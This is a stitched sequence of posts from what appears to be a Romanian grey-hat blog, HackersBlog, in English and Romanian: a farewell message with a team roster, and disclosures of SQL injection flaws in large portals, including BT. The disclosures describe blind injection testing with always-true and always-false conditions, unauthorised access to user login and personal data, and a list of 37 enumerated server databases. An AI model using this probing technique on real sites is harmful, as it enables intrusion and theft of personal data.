As we were saying in our interview over at RadioLynx we get borred extremly fast when it comes to projects dealing with hacking and security. Well then, we’ve gotten to that point where most of the team members had “enough” of it. Dont wacko on this. We are not pulling the plug because of any external factors or of fear. We simply dont have the time and desire to continue. Contrary to many opinions, we do have a private life.

We didn’t manage to publish enough articles and/or explanations/tutorials for our readers but still, we set the stage and for sure others will follow in short time. Its not difficult. There will always be intelligent people who will want to show to people the risks lurking all over the web. If we managed to get in the spotlight all over the world in just 4 months, then for sure others can do at least just as successful as we were.

We would like to thank those that supported us (especially zoso who gave us a good kick start and Bobby Voicu for his “oficial” promotion through “RadioLynx”). We would like to extend our thanks also to those who were against us but managed to motivate their opinions clearly and in a nice manner. We would like to give special thanks to newspapers outside Romania (especially theregister) who shad a proper and realistic light on our actions and also to the guys at news.softpedia.com and jurnalul.ro who were the only local press representatives who did not jump to conclusions and made idiotic bombastic affirmations just to gain more public rating. If there were others who were true to the facts and we missed to mention, we sincerly appologise as we don’t have an idea of how much of the local press mentioned us.

Most importantly, our visitors, who gave us moral support and articles for “readers day”. We recommend you continue to report vulnerablilities mailing the affected websites. Not to help site admins but rather, to inform innocent people of eventual problems caused by incompetency and lack of attention from the coders or sys admins.

As we were saying in our article “words”, the large companies will never admit to the problems they have, no matter how large they are. This is common practice in the business and it serves maintaing their public image clean. Don’t swallow the bait. Official notes are only meant to disinform and mislead you from the truth about the dangers you were exposed to.

Still, there were those rare cases of fair play which we trully appreciate and made us realise that there is sitll hope and that out there, in the “wild wild web”, you can still find quality people. This is one of the reasons for which we did not engage in controversies over the official declarations coming from corporations PR departments regarding the problems discovered on their websites. They minimized the issues to the point where they lead people believe nobody cold have been affected. Sadly, reality is not that bright.

Hackersblog team:

Tocsixu a.k.a. Shocker - administrator http://hackpedia.info / http://www.freakz.ro

Age: 19 yr
Studies: student
Status: not married
—-

Epic - administrator http://hackpedia.info

Age: 23
Studies: student
Status: stable relationship
—-

Unu a.k.a. unu_1234567 - team member of http://rstcenter.com

Age: 34 ani
Studies: -
Status: married
—-

Andre2000 a.k.a. Flama a.k.a. Kenpachi - administrator http://rstcenter.com

Age: 22
Studies: student
Status: presumably engaged
—-

Virjil a.k.a. kw3rln – administrator http://rstcenter.com

Age: 20
Studies: student
Status: engaged to Zakuta@RST )
—-

2fingers a.k.a. Nemessis – http://gandestevito.blogspot.com / ex-admin http://rstcenter.com

Age: 27

Studies: gymnasium
Status: apparently engaged for about 13 years
—-

Translator: (working in the shadows)

Age: 33
Studies: professional school
Status: not married

This being said, we bid you fare well and maybe we can meet again in other circumstances.

Best regards,

HackersBlog Team

————————————–

RO VERSION:

Dupa cum spuneam si in cadrul interviului RadioLynx, ne plictisim extrem de repede cand cine vorba de proiectele ce tin de hacking si securitate IT. Ei bine a venit clipa in care marea majoritate a celor din echipa au zis “gata!”. Nu va ganditi la tampenii. Nu se inchide blogul datorita unor presiuni externe sau a fricii. Niciodata n-am cedat la asa ceva, chiar si cand faceam prostii mari cat casa. Pur si simplu nu avem timpul si cheful necesar pentru a continua. Contrar parerilor multora din voi, avem si noi viata privata.

Nu am reusit sa publicam destule articole si explicatii pentru vizitatorii nostri, dar totusi am dat startul si cu siguranta cineva ne va lua locul in scurt timp. Nu este greu, oameni inteligenti sunt peste tot, important e ca cineva sa isi dea interesul si sa  prezinte in continuare riscurile ce pot fii intalnite la tot pasul pe www. Daca noi am reusit sa atragem atentia intregii lumi in doar cateva luni, cu siguranta si altii vor putea face asta la fel de bine sau poate cu mai mult succes decat noi.

Le multumim celor care ne-au promovat (in special lui zoso care ne-a dat un start bun si lui Bobby Voicu pentru promovarea “oficiala” prin intermediul postului de radio RadioLynx), le multumim si celor care au fost impotriva noastra dar au stiut sa isi motiveze clar si cu bun simt parerile, le multumim ziarelor online din afara Romaniei care au pus intr-o lumina buna actiunile noastre (mai ales redactiei TheRegister), dar si celor de la news.softpedia.com si jurnalul.ro, pentru ca au fost singurii conationali din presa online care nu s-au hazardat in afirmatii tembele de dragul senzationalului. Daca au mai fost si altii care nu au inflorit faptele dar totusi nu i-am mentionat imi cer scuze, dar nu stim cati din presa romaneasca au scris despre noi.

Nu uitam desigur nici vizitatorii hackersblog ce ne-au acordat suportul moral si articole pentru “ziua userilor”. Continuati sa raportati vulnerabilitatile la adresele de contact ale site-urilor afectate, nu pentru a-i ajuta pe administratori ci pentru a scapa oamenii nevinovati de eventualele probleme datorate neatentiei sau incompetentei coderilor.

Companiile mari, dupa cum spuneam in articolul “words”, nu vor recunoaste niciodata amploarea problemelor pe care le au. E o practica intalnita extrem de des, menita sa le curete imaginea patata. Nu inghititi acele declaratii oficiale. Au rolul de a va dezinforma in privinta pericolelor la care ati fost expusi.

Totusi au existat cateva exemple de fair-play pe care le-am apreciat cu adevarat si ne-au facut sa realizam ca Dracu’ nu e atat de negru si inca mai exista bun simt in online. Acesta este unul dintre motivele pentru care nu am stat sa ne contrazicem cu nimeni cand s-au dat declaratiile oficiale ce practic minimalizau problemele pana la punctul in care oamenii credeau ca de fapt nimeni nu putea fi afectat de probleme. Realitatea din pacate era alta. Sa trecem peste asta ca nu are rost sa mai discutam pe acest subiect.

Hackersblog team:

Tocsixu a.k.a. Shocker - administrator http://hackpedia.info / http://www.freakz.ro

Varsta: 19 ani
Studii: momentan student
Stare civila: necasatorit
—-

epic - administrator http://hackpedia.info

Varsta: 23
Studii: momentan student
Stare civila: relatie stabila
—-

unu a.k.a. unu_1234567 - team member http://rstcenter.com

Varsta: 34 ani
Studii: -
Stare civila: casatorit
—-

Andre2000 a.k.a. Flama, Kenpachi - administrator al http://rstcenter.com

Varsta: 22
Studii: momentan student
Stare civila: cica logodit
—-

Varsta: 20
Studii: momentan student
Stare civila: logodit cu Zakuta@RST )
—-

2fingers a.k.a. Nemessis - http://gandestevito.blogspot.com / ex-admin http://rstcenter.com

Studii: 8 clase
Stare civila: relatie de vreo 13 ani. Necasatorit
—-

“Fast and reliable broadband and internet access, tv, plus email, sms, webspace, and top rated search”

A huge portal with hundreds of thousands of registered users for different services. Same story. An unsanitized parameter allows an SQLi, thus access to the databases. In the first pic I concatenated the version, user, name of the db as well as the name of the tables we gain access to (you can see only a part of them).

In the next picture you can see login data as well as personal data of the users (username, firstname, surname, company, telephone, regdate, lastlogin, email, password):

In the last printscreen you can see some data from the customers data base:

————-

RO Version

“Fast and reliable broadband and internet access, tv, plus email, sms, webspace, and top rated search”.

Un portal mare, cu sute de mii de inregistrati pentru diferite servicii. Un parametru prost sanitizat permite un sql injection, deci acces la bazele de date. In prima poza am concatanat versiunelea, userul, numele bazei de date si numele schemelor la care avem acces (doar o parte dintre ele se vad in poza).

In urmatoarea poza se vad datele de logare, cat si personale (username, firstname, surname, company, telephone, regdate, lastlogin, email, password) ale clientilor:

In ultimul print screen se vad niste date din bogata baza customers:

Let us explain important details about our work.

There is and always will be a practice in companies about denying the gravity of certain vulnerabilities.
We understand this. Its normal for them to keep face, and maintain client confidence and trust. However, we don’t agree with these practices. We helped them and their clients, by bringing their awareness to the issues at hand, and it is their responsability to clean up their image, even if this can result in unpleasant situations for us.

Keep in mind that everytime the vulnerability wasn’t extremly dangerous we mentioned it in order to avoid confusions. We only post what we do, without truncating the truth so just to get props from our “fans”. We don’t earn any money from this, the daily traffic we create is useless to us and we don’t ever want to comercialize this blog. If we would have wanted fans and to be called by kids “1337 hackers” we would have started defacing every vulnerable site in sight. But we don’t want to do that and we’ll never step back into the blackhat side. Our goal is, and will be, to inform the masses about the dangers that lurke in the web. The fact that millions of persons have been spared of some problems by our actions gives us enough satisfaction.

The fact that the company diminishes the gravity of the situation through official statements doesn’t shed a good light over our actions, but we’ll never try to prove we’re right because this can only be done by endangering the users only to satisfy our pride. It’s not mature, professional and normal from us to do something like this.

We’ll continue to follow the rules that we’ve pledged to: find the vulns, contact the admins, publish the information in a way that protects the users. That’s it. We don’t ask the users to go against the companies/websites affected, but rather want them and the owners of the websites to be aware of the possible dangers that result from failing to secure a website that contains confidential information. If in doubt, is best to ask a qualified person, who is not involved with any of the parties (us or the websites) and then draw your conclusions.

This article was not made in reference to a certain company. We’ve generalized in order to cover the problem as simply as possible.

That’s about it about this topic. We wish you a pleasant stay here on http://hackersblog.org

RO Version:

Va vom explica cateva amanunte destul de importante legate de munca noastra.

Read the rest of this entry»

Let’s take a look inside of CCBill.com

Read the rest of this entry»

A very interesting presentation (video) at Blackhat conference.

http://jeremiahgrossman.blogspot.com

http://treyford.wordpress.com/

We kept on hold the publication of the vulnerable parameter which would allow full access in ALL the databases of the main server, waiting for the issue to be solved. Today, all the vulnerable pages have been taken offline for maintenance and security testing and thus, we will continue with the full disclosure.

Because this was a blind Sql Injection, I cannot show you the results of the injection from the web page. I made two screenshots, showing that the parameter is vulnerable. In the first pic you can see that if you are using AND+1 = 1, which is always true, the entire content is displayed:

In the second pic were we use AND+1=2, which is always false, the page does not load.

Now, lets see which databases did we gain access to:

available databases [37]:
[*] BT
[*] BT_Argos
[*] BT_BB_Anywhere
[*] BT_BBAndLine
[*] BT_BroadbandOpenzone
[*] BT_Bundling
[*] BT_CallMeArgos
[*] BT_CallSave
[*] BT_CallSaveStaff
[*] BT_comparebroadband
[*] BT_dabsCallback
[*] BT_DigitalVaultPlus
[*] BT_DisneyComp
[*] BT_HomeITCall
[*] BT_HomeITInstall
[*] BT_ITCalculator
[*] BT_Main
[*] BT_MobilePicker_Flexible
[*] BT_NetProtectOrder
[*] BT_ppc
[*] BT_PrinceCaspian
[*] BT_recontracting
[*] BT_RecontractingGenZ
[*] BT_SecureAdmin
[*] BT_SimOffer
[*] BT_Tactical_oneclick
[*] BT_TellAFriend
[*] BT_Tinkerbell
[*] BT_TotalBroadband
[*] BT_VisionOrderJourney
[*] BTM00585
[*] Crayon_Utility
[*] master
[*] MobilePortal
[*] model
[*] msdb
[*] tempdb

First database “BT” is the most interesting one. Nonetheless, the others also yeld a wealth of important data about the users: personal data, passwords, etc.

The user and [censored for security reasons] can be easily extracted. They contain login data for different data bases (default_censored for security reasons). You can extract name and passwords for sysusers just as well. They give us direct access to the server.

Database: m*****
Table: s*****
[18 columns]
+————-+———–+
| Column | Type |
+————-+———–+
(Content removed for security reasons)

This blind SQL Injection grants us way more access to larger parts of the databases then the one used to find the previous vulnerability in BT.com. Using this vulnerability an attacker can access personal data of the users.

Dont rush to conclusions and start pointing figers before you see the next articles where we will show similar issues with other large telecommunication providers. As we said earlier, we dont take sides, but rather, want to show that the above mentioned vulns cand be found almost everywhere.

We would like to thank BT.com for the fair-play and manners they displayed in addressing this issue in the email we got from them.

We appreciate and support the mature and to the point attitude they have. It is very important for us.

————-

RO Version:

Am asteptat publicarea parametrului vulnerabil, care permitea full acces in TOATE bazele de date ale serverului principal, pana cei in cauza rezolva problema. Azi au fost trecute pe “offline” toate paginile vulnerabile pentru a se efectua testele de securitate si noi putem continua articolul precedent.

Read the rest of this entry»

Pentru ca ati folosit expresia “un hacker roman a furat“. Sunteti cei mai de rahat si nu verificati informatiile.

Daca am fi furat mai aparea articolul asta pe blogul lor oficial? Cine ar multumi unor hoti? Sunteti o rusine pentru media din Romania.

Update: s-a scos inregistrarea emisiunii de pe site si s-a corectat textul.

“BT is one of the world’s leading providers of communications solutions and services operating in 170 countries. Its principal activities include networked IT services, local, national and international telecommunications services, and higher-value broadband and internet products and services. BT consists principally of four lines of business: BT Global Services, Openreach, BT Retail and BT Wholesale.”

“The most complete UK broadband, phone lines and mobile products, digital TV, web hosting, online security and networked IT services for home”

The description says it all. One of the giants in IT, mobile, TV and internet services. A Giant Company with a huge database. You don’t need to be an internet whiz, not even a computer literate to understand the tremendous implications that result from such a database beeing vulnerable.

A faulty parameter, improperly sanitized opens the vault to the pretious databases. One can gain access to such ordinary things as personal data, login data, and the like. In the first syntax I concatenated the table names as well as the version and the user of the database.

Lets see some of the user login data for different data bases (among which, of course, the admins of the respective sections).

As well as the login data and personal data (email, active, lastloggedin, firstname, surname, address, town, postcode, level, randomkey, password) for some of the registered users.

To be continued… but first we need to see reported vulns patched. We don’t want to put BT clients in danger by providing sensitive informations and hints to a potential attacker.

————-

RO version:

O firma mare, cu o baza de date imensa. Alta firma din domeniul IT si comunicatii care nu-si poate securiza propria baza de date. Un parametru prost sanitizat permite acces la date personale, de logare, etc.

In prima sintaxa am concatanat denumirile schemelor, cat si versiunea, userul bazei de date.

Read the rest of this entry»

Raportat de m4nt13

Dupa ce le-am trimis mail problema a fost rezolvata rapid de catre administratorul 9am.ro.